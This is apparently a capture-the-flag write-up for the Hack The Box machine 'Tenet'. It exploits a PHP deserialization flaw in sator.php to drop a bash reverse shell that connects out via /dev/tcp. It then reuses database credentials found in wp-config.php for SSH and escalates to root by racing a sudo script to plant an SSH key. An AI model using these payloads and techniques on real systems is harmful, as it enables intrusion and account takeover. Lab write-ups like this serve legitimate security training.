HTB Tenet Writeup
INFO
Machine IP = 10.10.10.223
OS = Linux
Level = MEDIUM
Points = 30
Write the IP of the machine to your /etc/hosts file
1
echo "10.10.10.223 tenet.htb" >> /etc/hosts
Scanning
1
nmap -sC -sV 10.10.10.223
Enumeration
1
Port 80 – WordPress Blog
Create a directory tenet and cd tenet/
then let’s do Gobuster
1
gobuster dir -u http://10.10.10.223 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log
- -x –extensions string File extension(s) to search for
- -t –threads int Number of concurrent threads (default 10)
We notice in the /Wordpress page there is a post called Migration with a comment by the user neil:
1
2
did you remove the sator php file and the backup?? the migration program is incomplete!
why would you do this?!
It’s seems like there is a backup site called sator.php. Adding sator.tenet.htb
to our /etc/hosts
file, and navigating to the URL
1
http://10.10.10.223/sator.php
we see this:
1
2
[+] Grabbing users from text file
[] Database updated
So, the php file is there and it’s getting executed. Since there was a mention of a backup file by the use neil, lets try to download that file:
1
wget http://sator.tenet.htb/sator.php.bak
After download sator.php.bak
rename it to sator.php
Let’s check the code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# sator.php
<?php
class DatabaseExport
{
public $user_file = 'users.txt';
public $data = '';
public function update_db()
{
echo '[+] Grabbing users from text file <br>';
$this-> data = 'Success';
}
public function __destruct()
{
file_put_contents(__DIR__ . '/' . $this ->user_file,
$this->data);
echo '[] Database updated <br>';
// echo 'Gotta get this working properly...';
}
}
$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);
$app = new DatabaseExport;
$app -> update_db();
?>
We see that the script looks for a GET input variable arepo
and unserializes it. To exploit this, lets look at Exploiting PHP Deserialization.
To write the exploit, lets do the following:
- Write the class DatabaseExport on our local machine, define the user_file to be a php file and the data to be a php reverse shell to our local machine.
- Serialize it and urlencode it to pass to the GET variable.
Now, open a php interactive cli using:
1
php -a
Write the following:
1
2
3
4
5
6
class DatabaseExport {
public $user_file = 'exploit.php';
public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/<Your IP address>/<Port for revers connection> 0>&1\'"); ?>';
}
print urlencode(serialize(new DatabaseExport));
The payload is generated. Copy the URL encoded output and make the request using curl:
1
curl -i http://sator.tenet.htb/sator.php?arepo=<Add URL encoded output here>
Open a nc listener on port that you added on payload and get a reverse shell by browsing to:
1
10.10.10.223/exploit.php
1
nc -nvlp <Your Port>
Now we have a reverse shell
Privilege Escalation
Checking in the /wordpress directory, we find credentials:
now do cat wp-config.php
then we get this DB configration
1
2
define( 'DB_USER', 'neil' );
define( 'DB_PASSWORD', 'Opera2112' );
Do ssh into the
user: neil
password: Opera2112
1
ssh [email protected]
Getting Root
Check our privileges as the user neil:
1
neil@tenet:/$ sudo -l
User neil may run the following commands on tenet:
1
(ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
Checking this file /usr/local/bin/enableSSH.sh
, we see the following function:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
addKey() {
tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
(umask 110; touch $tmpName)
/bin/echo $key >>$tmpName
checkFile $tmpName
/bin/cat $tmpName >>/root/.ssh/authorized_keys
/bin/rm $tmpName
}
The script:
- Generates and writes a SSH public key (id_rsa.pub) to the file /tmp/ssh-XXXXXXXX
- Copies the contents of this folder to root/.ssh/authorized_keys
- Deletes the tmp file. Lets do the 3 steps to exploit this
Step 1
First create an id_rsa
on your local machine using ssh-keygen
Run the following script as neil:
1
neil@tenet:/$ while true; do echo "YOUR id_rsa.pub key" | tee /tmp/ssh-*;
Done
This is going to continuously write your public key to the tmp folder
Step 2
Run the enableSSH.sh
script many times until we get a successful message:
1
2
3
4
5
6
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/etc/ssh$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!
Step 3
On your local host
1
kali@kali:~/.ssh$ chmod 600 id_rsa
Then ssh into the tenet box as root:
1
kali@kali:~/.ssh$ ssh -i id_rsa [email protected]
Done!
Hi there 👋 Support me!
Life is an echo—what you send out comes back.